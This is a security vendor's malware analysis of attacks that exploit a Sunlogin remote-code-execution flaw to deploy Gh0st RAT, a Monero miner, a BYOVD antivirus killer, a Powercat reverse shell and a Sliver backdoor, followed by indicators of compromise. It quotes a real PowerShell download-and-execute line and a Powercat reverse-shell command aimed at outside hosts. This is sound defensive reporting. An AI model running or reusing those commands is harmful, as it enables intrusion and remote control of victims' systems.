Sliver is an open-source penetration testing tool developed in the Go programming language. Cobalt Strike and Metasploit are major examples of penetration testing tools used by many threat actors, and various attack cases involving these tools have been covered here on the ASEC blog. Recently, there have been cases of threat actors using Sliver in addition to Cobalt Strike and Metasploit.
The ASEC (AhnLab Security Emergency response Center) analysis team is monitoring attacks against systems with either unpatched vulnerabilities or misconfigured settings. During this process, we have recently discovered a Sliver backdoor being installed through what is presumed to be vulnerability exploitation on certain software. Not only did threat actors use the Sliver backdoor, but they also used the BYOVD (Bring Your Own Vulnerable Driver) malware to incapacitate security products and install reverse shells.
The software that was targeted by this vulnerability exploitation was Sunlogin, a remote-control program developed in China. Sunlogin, which had its remote code execution vulnerability (CNVD-2022-10270 / CNVD-2022-03672) and the code that exploited said vulnerability made publicly available last year, is still being targeted by vulnerability attacks.
First, a brief summary of the Sliver penetration testing tool will be given. Afterward, cases involving the continuous Sunlogin attacks will be covered through our ASD (AhnLab Smart Defense) logs. Finally, we will break down the recently confirmed attack cases where Sliver and BYOVD were ultimately installed.
Penetration testing tools are used for the purpose of checking the security vulnerabilities within the network and systems of companies and institutes. They can potentially be used for malicious purposes if placed in the hands of threat actors as they generally provide various features for each penetration testing stage.
The most well-known commercial penetration testing tool would most likely be Cobalt Strike. Following the release of its cracked version, it is still being used by various threat actors to this very day. There is also the tool developed in open-source, Metasploit, which is similarly easy to obtain and thus often used in attacks. There are many other penetration testing tools aside from Cobalt Strike and Metasploit, but a majority of recent cases were found to be using the open-source penetration testing tool, Sliver. 
Among the characteristics of Sliver, the fact that it was developed using Go, a cross platform-supporting language, allows it to support Windows, Linux, and macOS. Its comparatively recent development could also be considered a defining characteristic, but this is because the tools that have been consistently used by threat actors since the past, like Cobalt Strike and Metasploit, are more prone to being detected by security products compared to Sliver. Therefore, Sliver is being used by various threat actors in place of existing tools like Cobalt Strike.   
Commands can be sent by the threat actor through the backdoor created by Sliver to perform a variety of malicious behaviors. Its features include most of the features supported by typical backdoors and RAT malware, such as process and file handling, command execution, uploading/downloading files, and screenshot capturing. It also provides other features necessary for overtaking internal networks, such as privilege escalation, process memory dumping, and lateral movement.
In addition to file, behavior, and memory detection, anti-malware security products are also capable of detecting network behaviors like when a malware strain tries to communicate with C&C servers. Therefore, various penetration testing tools, including Cobalt Strike, provide multiple ways to bypass communicating with the C&C server in order to evade network detection. Sliver also supports methods that use mTLS, WireGuard, HTTP(S), and DNS to communicate with the C&C server, which allows it to evade the network detection of security products through the encryption of network communication.
Session Mode and Beacon Mode are the two modes also supported by the Sliver backdoor. Sliver that has been built in Session Mode communicates with the C&C server in real-time while the Sliver built in Beacon Mode communicates with the C&C server asynchronously. The latter obtains commands or task lists from the C&C server and sends the results after executing them.
2. Vulnerability Exploitations and Attacks Targeting Sunlogin
Sunlogin is a remote-control utility developed by the Chinese tech company, Oray. In 2022, the remote code execution vulnerability, CNVD-2022-10270 / CNVD-2022-03672, was made publicly available along with the code that exploited it,  after which attacks that abused these were found. We assume that “SunloginCLient.exe” is the vulnerable process that is being targeted by attacks,  and multiple attacks have been confirmed since early 2022 according to our ASD logs.
2.1. Gh0st RAT
Although the packet used in the attack has not been found, it is assumed that the malware are installed through the Sunlogin RCE vulnerability exploitation following the PowerShell command ran on the “SunloginCLient.exe” process. The “SunloginCLient.exe” process used in the actual attacks is an earlier version than v184.108.40.206, which is known to have been patched. The following is the process tree of the PowerShell command that downloads and installs Gh0st RAT. It is through this that we can confirm that the PowerShell command was run by the “SunloginCLient.exe” process.
Aside from this, an assumption can also be inferred by examining the command used in the attacks. PoC, which was revealed first, uses the following command when exploiting vulnerabilities. 
The command used in the aforementioned Gh0st RAT attack is as follows and is similar to the command used in the PoC above.
2.2. XMRig CoinMiner
Threat actors occasionally install XMRig CoinMiner instead of Gh0stRAT. According to our ASD log, the following command is executed via the “SunloginCLient.exe” process which downloads and runs “syse.bat”, the batch malware.
“syse.bat” downloads either the “t.zip” or “t_64.zip” compressed file alongside 7z according to the hardware environment. The files are then unzipped in either the “C:\windows\WinSysMaintenance\.arc ” or “C:\WinSysMaintenance\.arc ” directories depending on the privilege.
Instead of XMRig CoinMiner being contained as-is within the compressed file, it is executed through the launcher and loader malware. “watch.exe” is the launcher and “splwow32.exe” is the loader malware that loads and decodes the encoded XMRig, “WINSysCoreR.bin”, before executing it in the memory.
Afterward, “syse.bat” changes the XMRig wallet address and transfers “WINSysCoreR.bin” as an argument of “splwow32.exe” before executing it. This starts the Monero coin mining process in the infected system.
3. Cases of Recent Attacks
There have been a steady number of attacks targeting the Sunlogin RCE vulnerability. Most of these cases involved the installation of Gh0st RAT and XMRig CoinMiner. In this blog post, we will be covering the recently confirmed attacks where a Sliver backdoor and Powercat reverse shell were installed.
The threat actor first installed a PowerShell script using the Sunlogin RCE vulnerability. This PowerShell script functioned by using the BYOVD technique to incapacitate security products installed in the system before installing a reverse shell using Powercat. It is unconfirmed whether it was done by the same threat actor, but after a few hours, a log shows that a Sliver backdoor was installed on the same system through a Sunlogin RCE vulnerability exploitation.
3.1. BYOVD & Powercat
The first command executed on the target system is a command that downloads and executes the following “2.ps1” PowerShell script.
The PowerShell script is obfuscated, but upon closer examination, we can see that it has a simple structure with the following two major features. The first feature decodes the compressed .NET PE before loading and executing it in the memory. The encoded PE is developed in .NET, and the function kdjvasbulidcfaeusyefoaexwyroaw7fyoaeufhodusicvfy8cye() is executed through a PowerShell command.
“ujacldfajlvjfaslflcevdfuaelfiua.exe” is assumed to be the open-source tool Mhyprot2DrvControl that was personally modified by the threat actor to forcefully terminate security products.  Unlike the open-source tool, the malware has the following AvList which contains the process names of anti-malware products to be forcefully terminated.
Mhyprot2DrvControl uses the BYOVD (Bring Your Own Vulnerable Driver) technique, which abuses vulnerable Windows driver files and uses the escalated privilege to perform arbitrary behaviors. Recently, many threat actors have been using this technique to escalate their privileges and forcefully terminate security products to evade detection. 
Mhyprot2DrvControl specifically abuses the mhyprot2.sys file. This file is an anti-cheat driver developed by the Chinese game company miHoYo, the creators of Genshin Impact. mhyprot2.sys is a normal, authenticated driver file with a valid signature, but the process that calls this file has vulnerable verification conditions. Through a simple bypassing process, the malware can access the kernel area through mhyprot2.sys. The developer of Mhyprot2DrvControl provided multiple features that can be utilized with the privileges escalated through mhyprot2.sys. Among these, the threat actor used the feature which allows the force termination of processes to develop a malware that shuts down multiple anti-malware products.
The second feature of the PowerShell script is downloading Powercat from an external source and using it to run the reverse shell in the infected system. When executed, the reverse shell connects to the C&C server and provides the threat actor control over the infected system by providing the cmd.exe, in other words, the shell.
IEX (New-Object Net.Webclient).DownloadString(“hxxp://45.144.3[.)216/powercat.ps1”);
powercat -c 220.127.116.11 -p 14356 -e cmd
3.2. Sliver Backdoor Attack
Beside the PowerShell script above, the threat actor used the vulnerability to execute a PowerShell command that installed the “acl.exe” malware. The following is our ASD log of the PowerShell command executed through the Sunlogin RCE vulnerability.
The downloaded “acl.exe” is the Sliver backdoor. Sliver is normally obfuscated when the backdoor is built. Thus, only the obfuscated Go functions can be seen even after decompiling. This means that the threat actor used the binaries generated by the Sliver framework in the attacks as-is without additional packing processes.
Since the function name is obfuscated but the practical routine remains the same, static analysis shows that Sliver utilized in the attack was built in Session Mode and used the mTLS protocol for communication with the C&C server. Additionally, the team found the configuration data that was decoded together with the Sliver backdoor’s name and C&C server address through the debugging process as shown in Figure 18.
- Sliver backdoor name: LITERARY_WHOLE
- C&C server address: mtls://43.128.62[.]42:8888
Recently, the team has confirmed cases of attack where various strains of malware, including the Sliver backdoor, were installed on vulnerable and unpatched software. Sliver is being used in various forms of attack by recent attack groups that steal information from company systems and install ransomware on them. This is because, as a penetration testing tool, Sliver offers the required step-by-step features like account information theft, internal network movement, and overtaking the internal network of companies, just like Cobalt Strike.
Users should apply the latest patch to their installed software to prevent vulnerability exploitations in advance. Also, V3 should be updated to the latest version so that malware infection can be prevented.
– CoinMiner/BAT.Generic.SC185824 (2023.01.24.03)
– Trojan/Win.Launcher.C5364876 (2023.01.24.00)
– Trojan/Win.Loader.C5364877 (2023.01.24.00)
– CoinMiner/BIN.Encoded (2023.01.24.03)
– CoinMiner/Text.Config (2023.01.24.03)
– Trojan/Win32.RL_Agent.R362708 (2021.01.12.05)
– Trojan/PowerShell.Obfuscated (2023.01.24.03)
– Trojan/Win.KILLAV.C5363966 (2023.01.22.02)
– Trojan/PowerShell.Powercat.S1567 (2021.07.07.02)
– Trojan/Win.Sliver.C5363965 (2023.01.22.02)
– Trojan/Win.KILLAV.C5363966 (2023.01.22.02)
– Trojan/PowerShell.Powercat.SA1567 (2021.07.07.02)
– 836810671d8e1645b7dd35b567d75f27 : XMRig Downloader Batch (syse.bat)
– 29d04d986a31fbeab39c6b7eab5f5550 : Launcher (watch.exe)
– 17a84000567055be92bda8659de5184d : Loader (splwow32.exe)
– 57b21f6b5d50e4ec525bee77bc724a4d : Encoded XMRig (WINSysCoreR.bin)
– 7eaa2e3d9c8b7aa6ecdd8dad0d1ba673 : config.json
– 1c5e484da6e6e1c2246f6d65f23bb49b : config.json
– 8c10401a59029599bed435575914b30d : Gh0stRAT
– 2434d32b1bebf22ac7ab461a44cf1624 : Powershell Script (2.ps1)
– f71b0c2f7cd766d9bdc1ef35c5ec1743 : AV Killer – BYOVD (ujacldfajlvjfaslflcevdfuaelfiua.exe)
– 8a319fa42e7c7432318f28a990f15696 : Powercat (powercat.ps1)
– 6f0c0faada107310bddc59f113ae9013 : Sliver Backdoor (acl2.exe)
– hxxp://5.199.173[.]103/syse.bat : XMRig Downloader Batch
– hxxp://5.199.173[.]103/t.zip : XMRig zip
– hxxp://5.199.173[.]103/t_64.zip : XMRig zip
– hxxp://5.199.173[.]103/7za.exe : 7z
– hxxp://61.155.8[.]2:81/c6/include/images/help23.sct : Gh0st RAT
– hxxp://45.144.3[.]216/2.ps1 : PowerShell Malware
– hxxp://45.144.3[.]216/powercat.ps1 : Powercat
– hxxp://43.128.62[.]42/acl.exe : Sliver Backdoor
– idc6.yjzj[.]org:56573 : Gh0st RAT
– 45.144.3[.]216:14356 : Powercat Reverse Shell
– 43.128.62[.]42:8888 : Sliver Backdoor
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.